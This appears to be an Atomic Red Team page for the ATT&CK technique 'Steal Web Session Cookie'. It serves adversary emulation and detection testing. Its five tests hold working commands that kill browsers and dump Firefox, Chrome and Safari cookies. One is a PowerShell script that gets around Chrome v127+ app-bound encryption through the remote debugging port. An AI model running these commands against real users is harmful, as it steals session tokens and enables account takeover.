# T1539 - Steal Web Session Cookie
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1539)
<blockquote>

An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.

Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)

There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) Adversaries may also steal cookies by injecting malicious JavaScript content into websites or relying on [User Execution](https://attack.mitre.org/techniques/T1204) by tricking victims into running malicious JavaScript in their browser.(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)

There are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (e.g., [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)

After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.

</blockquote>

## Atomic Tests

- [Atomic Test #1 - Steal Firefox Cookies (Windows)](#atomic-test-1---steal-firefox-cookies-windows)

- [Atomic Test #2 - Steal Chrome Cookies (Windows)](#atomic-test-2---steal-chrome-cookies-windows)

- [Atomic Test #3 - Steal Chrome Cookies via Remote Debugging (Mac)](#atomic-test-3---steal-chrome-cookies-via-remote-debugging-mac)

- [Atomic Test #4 - Steal Chrome v127+ cookies via Remote Debugging (Windows)](#atomic-test-4---steal-chrome-v127-cookies-via-remote-debugging-windows)

- [Atomic Test #5 - Copy Safari BinaryCookies files using AppleScript](#atomic-test-5---copy-safari-binarycookies-files-using-applescript)


<br/>

## Atomic Test #1 - Steal Firefox Cookies (Windows)
This test queries Firefox's cookies.sqlite database to steal the cookie data contained within it, similar to Zloader/Zbot's cookie theft function. 
Note: If Firefox is running, the process will be killed to ensure that the DB file isn't locked. 
See https://www.malwarebytes.com/resources/files/2020/05/the-silent-night-zloader-zbot_final.pdf.

**Supported Platforms:** Windows


**auto_generated_guid:** 4b437357-f4e9-4c84-9fa6-9bcee6f826aa





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sqlite3_path | Path to sqlite3 | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;sqlite-tools-win32-x86-3380200&#92;sqlite3.exe|
| output_file | Filepath to output cookies | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;T1539FirefoxCookies.txt|


#### Attack Commands: Run with `powershell`! 


```powershell
stop-process -name "firefox" -force -erroraction silentlycontinue
$CookieDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*\cookies.sqlite"
"select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];" | cmd /c #{sqlite3_path} "$CookieDBLocation" | out-file -filepath "#{output_file}"
```

#### Cleanup Commands:
```powershell
remove-item #{output_file} -erroraction silentlycontinue
```



#### Dependencies:  Run with `powershell`!
##### Description: Sqlite3 must exist at (#{sqlite3_path})
##### Check Prereq Commands:
```powershell
if (Test-Path "#{sqlite3_path}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip"
Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -force
```




<br/>
<br/>

## Atomic Test #2 - Steal Chrome Cookies (Windows)
This test queries Chrome's SQLite database to steal the encrypted cookie data, designed to function similarly to Zloader/Zbot's cookie theft function. 
Once an adversary obtains the encrypted cookie info, they could go on to decrypt the encrypted value, potentially allowing for session theft. 
Note: If Chrome is running, the process will be killed to ensure that the DB file isn't locked. 
See https://www.malwarebytes.com/resources/files/2020/05/the-silent-night-zloader-zbot_final.pdf.

**Supported Platforms:** Windows


**auto_generated_guid:** 26a6b840-4943-4965-8df5-ef1f9a282440





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| cookie_db | Filepath for Chrome cookies database | string | $env:localappdata&#92;Google&#92;Chrome&#92;User Data&#92;Default&#92;Network&#92;Cookies|
| sqlite3_path | Path to sqlite3 | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;sqlite-tools-win32-x86-3380200&#92;sqlite3.exe|
| output_file | Filepath to output cookies | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;T1539ChromeCookies.txt|


#### Attack Commands: Run with `powershell`! 


```powershell
stop-process -name "chrome" -force -erroraction silentlycontinue
"select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];" | cmd /c #{sqlite3_path} "#{cookie_db}" | out-file -filepath "#{output_file}"
```

#### Cleanup Commands:
```powershell
remove-item #{output_file}
```



#### Dependencies:  Run with `powershell`!
##### Description: Sqlite3 must exist at (#{sqlite3_path})
##### Check Prereq Commands:
```powershell
if (Test-Path "#{sqlite3_path}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip"
Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -force
```




<br/>
<br/>

## Atomic Test #3 - Steal Chrome Cookies via Remote Debugging (Mac)
The remote debugging functionality in Chrome can be used by malware for post-exploitation activities to obtain cookies without requiring keychain access. By initiating Chrome with a remote debug port, an attacker can sidestep encryption and employ Chrome's own mechanisms to access cookies.

If successful, this test will output a list of cookies.

Note: Chrome processes will be killed during this test.

See https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e

**Supported Platforms:** macOS


**auto_generated_guid:** e43cfdaf-3fb8-4a45-8de0-7eee8741d072






#### Attack Commands: Run with `bash`! 


```bash
killall 'Google Chrome'
sleep 1
open -a "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --args --remote-debugging-port=1337 --remote-allow-origins=http://localhost/
sleep 1
/tmp/WhiteChocolateMacademiaNut/chocolate -d cookies -p 1337
```

#### Cleanup Commands:
```bash
rm -rf /tmp/WhiteChocolateMacademiaNut
```



#### Dependencies:  Run with `bash`!
##### Description: Install Go
##### Check Prereq Commands:
```bash
go version
```
##### Get Prereq Commands:
```bash
brew install go
```
##### Description: Download and compile WhiteChocolateMacademiaNut
##### Check Prereq Commands:
```bash
/tmp/WhiteChocolateMacademiaNut/chocolate -h
```
##### Get Prereq Commands:
```bash
git clone https://github.com/slyd0g/WhiteChocolateMacademiaNut.git /tmp/WhiteChocolateMacademiaNut
cd /tmp/WhiteChocolateMacademiaNut
go mod init chocolate
go mod tidy
go build
```




<br/>
<br/>

## Atomic Test #4 - Steal Chrome v127+ cookies via Remote Debugging (Windows)
Chrome v127+ uses app-bound encryption to protect cookies. This test bypasses that protection to obtain the cookies. If successful, the test outputs cookie values to the console.
Note: Will stop any instances of Chrome already running
Adapted from https://embracethered.com/blog/posts/2024/cookie-theft-in-2024-and-what-todo

**Supported Platforms:** Windows


**auto_generated_guid:** b647f4ee-88de-40ac-9419-f17fac9489a7






#### Attack Commands: Run with `powershell`! 


```powershell
$devToolsPort = 9222
$testUrl = "https://www.google.com"
stop-process -name "chrome" -force -erroraction silentlycontinue
$chromeProcess = Start-Process "chrome.exe" "$testUrl --remote-debugging-port=$devToolsPort --profile-directory=Default" -PassThru
Start-Sleep 10
$jsonResponse = Invoke-WebRequest "http://localhost:$devToolsPort/json" -UseBasicParsing
$devToolsPages = ConvertFrom-Json $jsonResponse.Content
$ws_url = $devToolsPages[0].webSocketDebuggerUrl
$ws = New-Object System.Net.WebSockets.ClientWebSocket
$uri = New-Object System.Uri($ws_url)
$ws.ConnectAsync($uri, [System.Threading.CancellationToken]::None).Wait()
$GET_ALL_COOKIES_REQUEST = '{"id": 1, "method": "Network.getAllCookies"}'
$buffer = [System.Text.Encoding]::UTF8.GetBytes($GET_ALL_COOKIES_REQUEST)
$segment = New-Object System.ArraySegment[byte] -ArgumentList $buffer, 0, $buffer.Length
$ws.SendAsync($segment, [System.Net.WebSockets.WebSocketMessageType]::Text, $true, [System.Threading.CancellationToken]::None).Wait()
$completeMessage = New-Object System.Text.StringBuilder
do {
    $receivedBuffer = New-Object byte[] 2048
    $receivedSegment = New-Object System.ArraySegment[byte] -ArgumentList $receivedBuffer, 0, $receivedBuffer.Length
    $result = $ws.ReceiveAsync($receivedSegment, [System.Threading.CancellationToken]::None).Result
    $receivedString = [System.Text.Encoding]::UTF8.GetString($receivedSegment.Array, $receivedSegment.Offset, $result.Count)
    $completeMessage.Append($receivedString)
} while (-not $result.EndOfMessage)
$ws.CloseAsync([System.Net.WebSockets.WebSocketCloseStatus]::NormalClosure, "Closing", [System.Threading.CancellationToken]::None).Wait()
try {
    $response = ConvertFrom-Json $completeMessage.ToString()
    $cookies = $response.result.cookies
} catch {
    Write-Host "Error parsing JSON data."
}
Write-Host $cookies
Stop-Process $chromeProcess -Force
```






<br/>
<br/>

## Atomic Test #5 - Copy Safari BinaryCookies files using AppleScript
This command will copy Safari BinaryCookies files using AppleScript as seen in Atomic Stealer.

**Supported Platforms:** macOS


**auto_generated_guid:** e57ba07b-3a33-40cd-a892-748273b9b49a





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| destination_path | Specify the path to copy the BinaryCookies file into. | path | /private/tmp|


#### Attack Commands: Run with `sh`! 


```sh
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")' -e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing' -e 'end tell'
```

#### Cleanup Commands:
```sh
rm "#{destination_path}/Cookies.binarycookies"
```





<br/>